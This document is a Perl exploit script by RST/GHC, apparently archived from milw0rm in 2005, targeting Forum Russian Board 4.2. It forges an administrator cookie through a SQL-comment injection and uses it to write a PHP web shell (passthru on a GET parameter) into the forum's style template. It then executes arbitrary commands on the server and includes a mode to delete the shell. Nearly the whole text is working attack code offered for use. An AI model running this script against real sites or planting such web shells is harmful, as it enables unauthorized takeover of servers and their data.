Forum Russian Board 4.2 Full Command Execution Exploit

#!/usr/bin/perl

#   Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
#   command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
#   bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
#   RST/GHC - http://rst.void.ru , http://ghc.ru

  8    use IO::Socket;
  9    use Getopt::Std;
  10
  11   getopts("h:p:u:i:c:");
  12
  13   $host   =   $opt_h;
  14   $path   =   $opt_p;
  15   $user   =   $opt_u;
  16   $id     =   $opt_i;
  17   $cmd    =   $opt_c || ’create’;
  18
  19   $cmdspl = "%26%26"; # ;      − for unix
  20                       # %26%26 − for windows
  21
  22   if(!$host || !$path) { usage(); }
  23   if(($cmd eq ’create’ || $cmd eq ’delete’) && (!$user || !$id)) { usage(); }
  24
  25   $host =~ s/(http:\/\/)//g;
  26   $cook = $user."’ /*";
  27
  28   if($cmd eq ’create’ || $cmd eq ’delete’){
  29   head();
  30   print ">>> CREATE SHELL\n" if ($cmd eq ’create’);
  31   print ">>> DELETE SHELL\n" if ($cmd eq ’delete’);
  32   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  33   print $sock "GET ${path}admin/style_edit.php HTTP/1.1\n";
  34   print $sock "Host: $host\n";
  35   print $sock "Accept: */*\n";
  36   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  37   print $sock "Connection: close\n\n";
  38   print "GETTING CURRENT STYLE ... [";
  39   while ($res = <$sock>)
  40   {
  41     if($res =~ /(.*)<\/textarea>/) { $data .= $1; $p = 0; }
  42     $data .= $res if $p;
  43     if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
  44   }
  45
  46   if(length($data)>0) { print " DONE ]\n"; }
  47   else { print " FAILED ]\n"; exit(); }
  48
  49   if($data =~ /rst_ghc/)
  50    {
  51    if($cmd eq ’create’) { print "SHELL ALREADY EXIST!"; exit(); }
  52    if($cmd eq ’delete’)
RusH                                                                                                                   06/21/2005
                         Forum Russian Board 4.2 Full Command Execution Exploit                                         Page 2/3
  53      {
  54      print "SHELL EXIST.\nDELETING SHELL.\n";
  55      $data =~ s/\s*<\? if\(\$_GET\[rst_ghc\]\)\{ passthru\(\$_GET\[rst_ghc\]\); \} \?>//g;
  56      }
  57    }
  58   else
  59    {
  60    if($cmd eq ’create’)
  61      {
  62      $data .= "\n";
  63      $data .= ’<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>’;
  64     }
  65    if($cmd eq ’delete’) { print "SHELL NOT EXIST. CAN’T DELETE."; exit(); }
  66    }
  67
  68   $data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  69   $post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
  70   print "CREATE NEW STYLE ...[";
  71   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\r\n";
  72   print $sock "POST ${path}admin/style_edit.php HTTP/1.1\n";
  73   print $sock "Host: $host\n";
  74   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  75   print $sock "Content−Type: application/x−www−form−urlencoded\n";
  76   print $sock "Content−length: ".length($post)."\n\n";
  77   print $sock "$post";
  78   print $sock "\n\n";
  79   print " DONE ]\n";
  80   if($cmd eq ’create’) { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
  81   if($cmd eq ’delete’) { print "SHELL DELETED!"; }
  82   }
  83   else
  84   {
  85   head();
  86   print ">>> COMMAND EXECUTE\n";
  87   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  88   print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1\n";
  89   print $sock "Host: $host\n";
  90   print $sock "Accept: */*\n";
  91   print $sock "Connection: close\n\n";
  92
  93   while ($res = <$sock>)
  94   {
  95     if($res =~ /^_END_/) { $p = 0; }
  96     $data .= $res if $p;
  97     if($res =~ /^_START_/) { $p = 1; }
  98   }
  99   if(length($data)>0) {
 100                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 101                          print $data;
 102                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 103                          exit(0);
 104                        }
RusH                                                                                                                    06/21/2005
                            Forum Russian Board 4.2 Full Command Execution Exploit      Page 3/3
 105   else { print "[−] FAILED\nMaybe you forget create shell first?\n"; exit(0); }
 106
 107   }
 108
 109   sub usage()
 110   {
 111     head();
 112     print " USAGE : r57frb.pl [options]\n\n";
 113     print " Options: \n";
 114     print "      −h − host e.g. ’127.0.0.1’ , ’www.frb.ru’\n";
 115     print "      −p − path to forum e.g. ’/frb/’ , ’/forum/’\n";
 116     print "      −u − admin username e.g. ’admin’\n";
 117     print "      −i − admin id e.g. ’1’\n";
 118     print "      −c [create|delete|cmd]\n";
 119     print "         create − for create shell\n";
 120     print "         delete − for delete shell\n";
 121     print "         cmd − any command for execute\n";
 122     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 123   exit(0);
 124   }
 125
 126   sub head()
 127   {
 128     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 129     print "Forum Russian Board 4.0 Full command execution exploit by RST/GHC\n";
 130     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 131   }
 132
# milw0rm.com [2005-06-21]



